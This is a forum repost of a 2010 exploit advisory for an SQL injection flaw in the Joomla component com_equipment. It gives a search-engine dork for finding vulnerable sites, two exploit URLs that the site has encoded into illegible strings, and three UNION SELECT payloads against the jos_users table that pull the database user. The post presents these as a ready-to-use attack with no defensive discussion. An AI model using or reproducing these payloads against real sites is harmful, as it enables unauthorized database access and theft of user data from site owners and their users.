首页
社区
课程
招聘
[转帖]Joomla Component (com_equipment) SQL Injection Vulnerability
发表于: 2010-8-18 06:14 1967

[转帖]Joomla Component (com_equipment) SQL Injection Vulnerability

2010-8-18 06:14
1967
# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability   

# Date : 16 - 8 - 2010   

# Author : Forza-Dz   

# Vendor : 88eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3A6G2L8$3#2D9j5h3g2I4N6h3W2H3L8h3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.  

# Version : All Versions   

# Tested on : Win Sp2 and Mac   

############################################################   

Dork = inurl:"com_equipment"   

############################################################   

--- SQL Injection Vulenrability ---   

SQL Injection Vulenrability component "com_equipment"   

############################################################  

===[ Exploit ]===   

7ecK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6W2M7i4g2A6M7r3#2W2L8Y4c8Q4x3U0k6$3K9h3g2%4i4K6y4p5k6r3g2@1j5h3W2D9M7#2)9J5y4X3W2V1i4K6y4p5i4K6g2n7f1#2q4x3i4K6g2p5i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.  

or  

b2fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6W2M7i4g2A6M7r3#2W2L8Y4c8Q4x3U0k6@1j5i4y4C8i4K6y4p5j5$3!0E0M7r3!0F1k6h3&6@1M7#2)9J5y4X3W2V1i4K6y4p5y4o6g2Q4x3U0k6K6k6h3y4Q4y4h3k6E0k6h3&6Q4y4h3k6A6k6q4)9K6c8q4)9#2b7W2y4c8e0q4)9#2c8q4)9J5y4X3&6T1M7%4m8Q4x3@1t1`.  

############################################################   

===[Injection]===   

[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--  

[SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--   

[SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--  

############################################################   

Greetz @ MCA-CRB All "DZ" "MusliM"   

############################################################   

        ======[saha fotorkom]======   

############################################################

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回